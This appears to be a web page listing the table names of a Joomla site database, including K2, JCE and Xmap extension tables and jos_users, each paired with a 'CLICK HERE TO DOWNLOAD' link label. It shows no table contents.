beta_viewlevels: CLICK HERE TO DOWNLOAD
beta_weblinks: CLICK HERE TO DOWNLOAD
jos_banner: CLICK HERE TO DOWNLOAD
jos_bannerclient: CLICK HERE TO DOWNLOAD
jos_categories: CLICK HERE TO DOWNLOAD
jos_components: CLICK HERE TO DOWNLOAD
jos_contact_details: CLICK HERE TO DOWNLOAD
jos_content: CLICK HERE TO DOWNLOAD
jos_content_frontpage: CLICK HERE TO DOWNLOAD
jos_content_rating: CLICK HERE TO DOWNLOAD
jos_core_acl_aro: CLICK HERE TO DOWNLOAD
jos_core_acl_aro_groups: CLICK HERE TO DOWNLOAD
jos_core_acl_aro_map: CLICK HERE TO DOWNLOAD
jos_core_acl_aro_sections: CLICK HERE TO DOWNLOAD
jos_core_log_items: CLICK HERE TO DOWNLOAD
jos_core_log_searches: CLICK HERE TO DOWNLOAD
jos_groups: CLICK HERE TO DOWNLOAD
jos_jce_extensions: CLICK HERE TO DOWNLOAD
jos_jce_groups: CLICK HERE TO DOWNLOAD
jos_jce_plugins: CLICK HERE TO DOWNLOAD
jos_k2_attachments: CLICK HERE TO DOWNLOAD
jos_k2_categories: CLICK HERE TO DOWNLOAD
jos_k2_comments: CLICK HERE TO DOWNLOAD
jos_k2_extra_fields: CLICK HERE TO DOWNLOAD
jos_k2_extra_fields_groups: CLICK HERE TO DOWNLOAD
jos_k2_items: CLICK HERE TO DOWNLOAD
jos_k2_rating: CLICK HERE TO DOWNLOAD
jos_k2_tags: CLICK HERE TO DOWNLOAD
jos_k2_tags_xref: CLICK HERE TO DOWNLOAD
jos_k2_user_groups: CLICK HERE TO DOWNLOAD
jos_k2_users: CLICK HERE TO DOWNLOAD
jos_menu: CLICK HERE TO DOWNLOAD
jos_menu_types: CLICK HERE TO DOWNLOAD
jos_messages: CLICK HERE TO DOWNLOAD
jos_messages_cfg: CLICK HERE TO DOWNLOAD
jos_migration_backlinks: CLICK HERE TO DOWNLOAD
jos_modules: CLICK HERE TO DOWNLOAD
jos_modules_menu: CLICK HERE TO DOWNLOAD
jos_newsfeeds: CLICK HERE TO DOWNLOAD
jos_plugins: CLICK HERE TO DOWNLOAD
jos_poll_data: CLICK HERE TO DOWNLOAD
jos_poll_date: CLICK HERE TO DOWNLOAD
jos_poll_menu: CLICK HERE TO DOWNLOAD
jos_polls: CLICK HERE TO DOWNLOAD
jos_qcontacts_config: CLICK HERE TO DOWNLOAD
jos_qcontacts_details: CLICK HERE TO DOWNLOAD
jos_quote: CLICK HERE TO DOWNLOAD
jos_sections: CLICK HERE TO DOWNLOAD
jos_stats_agents: CLICK HERE TO DOWNLOAD
jos_templates_menu: CLICK HERE TO DOWNLOAD
jos_users: CLICK HERE TO DOWNLOAD
jos_weblinks: CLICK HERE TO DOWNLOAD
jos_xmap: CLICK HERE TO DOWNLOAD
jos_xmap_ext: CLICK HERE TO DOWNLOAD
jos_xmap_sitemap: CLICK HERE TO DOWNLOAD